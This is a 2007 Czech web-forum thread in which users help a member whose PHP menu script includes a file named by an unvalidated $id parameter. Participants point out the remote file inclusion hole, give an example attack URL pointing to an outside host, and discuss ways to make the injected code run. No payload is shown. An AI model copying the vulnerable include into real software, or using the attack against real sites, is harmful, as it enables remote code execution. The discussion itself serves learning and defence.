Registrace nového uživatele     Návod     Kluby     Archív  Lopuchu     Lopuch.cz  

Modrá je dobrá
zelená je lepší

Lopuch.cz
Jméno:
Heslo:
Podpora LCD:
 
Klub Web [ŽP: neomezená] (kategorie Programování) moderuje Kdokoliv.
Archiv
Domovská stránka aktualizována 28.7.2019 17:46
  
  Nastavení klubu     Nastavení práv     Homepage     Anketa     Přítomní     Oblíbené     Lopuch     Kategorie  
autor: 
text: 
vyplnit a 
Help
 Titulek, text příspěvku  
Opište pozpátku následující text bez prostředního znaku: kqnagvw
[ 4075 ] <Novější  <<<Nejnovější  Nejstarší>>>  Starší>  
bighead BIGHead Pořádáte akci, vyzkoušejte - naše moderátory 28.4.2007 23:18  4708
kdokolivNepochopil :). Je to pro me celkem spanelska vesnice, ale chci do toho aspon trochu proniknout...

Pepak: nedelam -> netusim zatim jak na to ;)
kdokoliv Kdokoliv Nevidím důvod dělat cokoliv bezdůvodně. - http://kkl2401.wz.cz 28.4.2007 23:01  4707
pepak [4705]: Ano, dobra, interpretovat to nebude, tak to posle zpatky jako plaintext. To ho pak to PHP na tom druhem serveru vezme a zacne interpretovat? Ja myslel, ze proste u remote includu tohle PHP nedela (co kdybych chtel skutecne includnout ze vzdaleneho serveru obycejny plaintext, ktery cirou nahodou obsahuje veci interpretovatelne PHPkem - to prece taky nejak musi jit).
pepak pepak - Pepak.net 28.4.2007 22:10  4706
(Nemluve tedy o tom, ze nevidim duvod, proc by muj PHP skript nemohl udelat vystup zacinajici <?php ...)
pepak pepak - Pepak.net 28.4.2007 22:09  4705
Kdokoliv: Proc by mel muj server interpretovat to PHP? Na mem serveru jsem to ja, kdo rika, co se bude a nebude interpretovat...

BigHead: Ano, muzes. Delas to?
johny_g Johny_G - Relaxační terapie pro lopušáky ZDARMA! 28.4.2007 22:05  4704
Kdokoliv [4703]: Máš vlastně pravdu. Za normálních okolností by se skript interpretoval. Ale... Záleží na tom, jak je ta či ona inkluze nastavená. Ideální je, když je v adrese i přípona a můžeš mu narvat txt s php skriptem. V opačném případě bych asi zkusil podstrčit skript ze serveru bez PHP.
kdokoliv Kdokoliv Nevidím důvod dělat cokoliv bezdůvodně. - http://kkl2401.wz.cz 28.4.2007 21:55  4703
BIGHead [4701]: Nepochopils, o cemu mluvis. Ja zase na oplatku to nepochopil predtim, cekal jsem, ze problem je v necem uplne jinym.
Johny_G [4700]: A jses si jistej, nechces si to radsi overit? Ten vzdalenej server nevi o tom, ze je includovan, ten je pozadat GET metodou o nejaky zdroj, ten je nahodou PHP scriptem, tedy ho provede, rozhodne neposle zpatky PHP zdrojak, to by byla bezpecnostni dira jako prase (na strane PHP jako takoveho).
johny_g Johny_G - Relaxační terapie pro lopušáky ZDARMA! 28.4.2007 21:43  4702
BIGHead [4699]: Já používám tento způsob: 
if (file_exists($obsah)) {include $obsah;}

Ale mrzí mě, že ti to prozrazuju, fakt jsem si to vždycky chtěl vyzkoušet :-).


BIGHead [4701]: Protože na IC za tebe ten GET udělají register_globals. Když jsou na serveru zakázané, musíš si tu proměnnou vždy GETem vytáhnout z adresy.
bighead BIGHead Pořádáte akci, vyzkoušejte - naše moderátory 28.4.2007 21:39  4701
kdokolivA proč to teda bez GETu nefungovalo??
johny_g Johny_G - Relaxační terapie pro lopušáky ZDARMA! 28.4.2007 21:38  4700
Kdokoliv [4698]: No obávám se, že by se provedl až na straně bigheada :-). Tak PHP injection funguje. To mě zarazilo spíš, než globals, které já stále ještě používám a děsím se, kdy WZ přeskočí na nové PHP :-)).
bighead BIGHead Pořádáte akci, vyzkoušejte - naše moderátory 28.4.2007 21:37  4699
pepakAle ja mu snad můžu říct, aby jako id nebral nic z jinych domen nebo ne?
Teď teda absolutně netušim jestli to jde udělat, ani netuším jak bych to provedl...
Nebo je jiný "bezpečnější" způsob?
kdokoliv Kdokoliv Nevidím důvod dělat cokoliv bezdůvodně. - http://kkl2401.wz.cz 28.4.2007 21:37  4698
Boze to me teda vubec nenapadlo, ze bych opravdu moh nekdo myslet vazne, ze $id prijde GETem a ze tedy problem je prave v tom...

pepak [4697]: To by asi moc nefungovalo, ne? Ten vzdalenej script by interpretovalo PHP uz na pepak.net, a tudiz by z toho moc nezbylo, nebo ne?
pepak pepak - Pepak.net 28.4.2007 21:31  4697
Bighead: Nejslabsi misto to ma v tom include. Rekneme, ze ten skript spustim jako http://www.bighead.cz/skript.php?id=http://www.pepak.net/hack
bighead BIGHead Pořádáte akci, vyzkoušejte - naše moderátory 28.4.2007 21:29  4696
Johny_G$_GET['id'] - pomohlo to, me to napadlo uz prve, ale narval jsem mu to rovnou do toho (!isset($_GET['id'])): - a to teda nejak nepobral :). Odkaz sem mozna casem hodim, treba mi poradite kde to ma nejslabsi misto (bude jich tam hooodne :)
johny_g Johny_G - Relaxační terapie pro lopušáky ZDARMA! 28.4.2007 21:24  4695
BIGHead [4693]: Pak bych prosil adresu. Vypadá to, že bych si konečně mohl vyzkoušet injection :-).

Napadá mě, že neumí register_globals. Hoď na začátek $id = $_GET['id'];.
bighead BIGHead Pořádáte akci, vyzkoušejte - naše moderátory 28.4.2007 21:15  4693
Mám následující kód, který mi podle zvolené položky menu, automaticky načte odpovídající soubor...
Je nějaký důvod, proč by to někde nefungovalo? Konkrétně mi to neběží na hostingu FORPSI. Co tam mám případně upravit? Díky

<?php if (!isset($id)):
$id = "home";
endif;
$obsah = $id.".php";
include $obsah;
?>
[ 4075 ] <Novější  <<<Nejnovější  Nejstarší>>>  Starší>  

(c) 2001-2011 Lopuch.cz   
Kontakt